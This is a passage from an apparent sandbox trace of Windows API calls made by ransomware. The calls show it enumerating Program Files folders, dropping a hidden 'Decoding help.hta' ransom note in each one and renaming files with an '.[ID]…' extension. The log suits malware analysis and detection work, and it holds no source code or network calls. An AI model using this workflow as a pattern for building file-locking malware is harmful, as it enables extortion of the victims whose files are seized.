lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" [0044.683] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0044.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\VGX.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx\\vgx.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.684] FindNextFileW (in: hFindFile=0x5da8f8, lpFindFileData=0x199dfd30 | out: lpFindFileData=0x199dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7a7ff6, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xee7a7ff6, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x454d7b80, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x10f200, dwReserved0=0x0, dwReserved1=0x0, cFileName="VGX.dll", cAlternateFileName="")) returned 0 [0044.684] FindClose (in: hFindFile=0x5da8f8 | out: hFindFile=0x5da8f8) returned 1 Thread: id = 400 os_tid = 0xb08 [0043.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*", lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da9b8 [0044.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.844] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.845] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.845] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.845] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec183f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec183f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x278b, dwReserved0=0x0, dwReserved1=0x0, cFileName="16to9Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0044.845] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0044.845] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0044.845] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0044.845] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0xffffffff [0044.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0044.875] WriteFile (in: hFile=0x3b0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x19b1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x19b1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.875] CloseHandle (hObject=0x3b0) returned 1 [0044.876] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.876] lstrcmpiW (lpString1="Decoding help.hta", lpString2="16to9Squareframe_Buttongraphic.png") returned 1 [0044.876] lstrlenW (lpString="16to9Squareframe_Buttongraphic.png") returned 34 [0044.876] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0044.876] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0044.876] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0044.876] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="16to9Squareframe_Buttongraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" [0044.876] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" [0044.876] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0044.876] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0045.414] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="16to9Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0048.481] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0048.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0048.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0048.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0048.481] lstrcmpiW (lpString1="Decoding help.hta", lpString2="16to9Squareframe_SelectionSubpicture.png") returned 1 [0048.481] lstrlenW (lpString="16to9Squareframe_SelectionSubpicture.png") returned 40 [0048.481] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0048.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0048.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0048.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="16to9Squareframe_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" [0048.481] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" [0048.481] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.482] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="16to9Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0048.482] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0048.482] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0048.482] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0048.482] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0048.482] lstrcmpiW (lpString1="Decoding help.hta", lpString2="16to9Squareframe_VideoInset.png") returned 1 [0048.482] lstrlenW (lpString="16to9Squareframe_VideoInset.png") returned 31 [0048.482] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0048.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0048.482] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0048.482] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="16to9Squareframe_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" [0048.482] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" [0048.482] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.843] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e55, dwReserved0=0x0, dwReserved1=0x0, cFileName="4to3Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0050.127] lstrcpyW (in: lpString1=0x10c96810, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.127] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0050.127] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0050.127] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4to3Squareframe_Buttongraphic.png") returned 1 [0050.127] lstrlenW (lpString="4to3Squareframe_Buttongraphic.png") returned 33 [0050.127] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0050.127] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.127] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="4to3Squareframe_Buttongraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" [0050.127] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" [0050.127] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.127] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_buttongraphic.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.128] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x0, dwReserved1=0x0, cFileName="4to3Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0050.128] lstrcpyW (in: lpString1=0x10c96810, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.128] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0050.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0050.128] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4to3Squareframe_SelectionSubpicture.png") returned 1 [0050.128] lstrlenW (lpString="4to3Squareframe_SelectionSubpicture.png") returned 39 [0050.128] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0050.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.128] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="4to3Squareframe_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" [0050.128] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" [0050.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" [0050.128] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png"), lpNewFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_SelectionSubpicture.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_selectionsubpicture.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.128] FindNextFileW (in: hFindFile=0x5da9b8, lpFindFileData=0x19b1fd30 | out: lpFindFileData=0x19b1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec8a80b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec8a80b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="4to3Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0050.128] lstrcpyW (in: lpString1=0x10c96810, lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.128] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.128] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" [0050.128] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Decoding help.hta" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\decoding help.hta")) returned 0x1 [0050.128] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4to3Squareframe_VideoInset.png") returned 1 [0050.129] lstrlenW (lpString="4to3Squareframe_VideoInset.png") returned 30 [0050.129] lstrcmpiW (lpString1="[ID]", lpString2=".png") returned 1 [0050.129] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*" [0050.129] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*.*") returned 51 [0050.129] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\", lpString2="4to3Squareframe_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" [0050.129] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png" | out: lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png") returned="\\\\?\\C:\\Program Files\\DVD 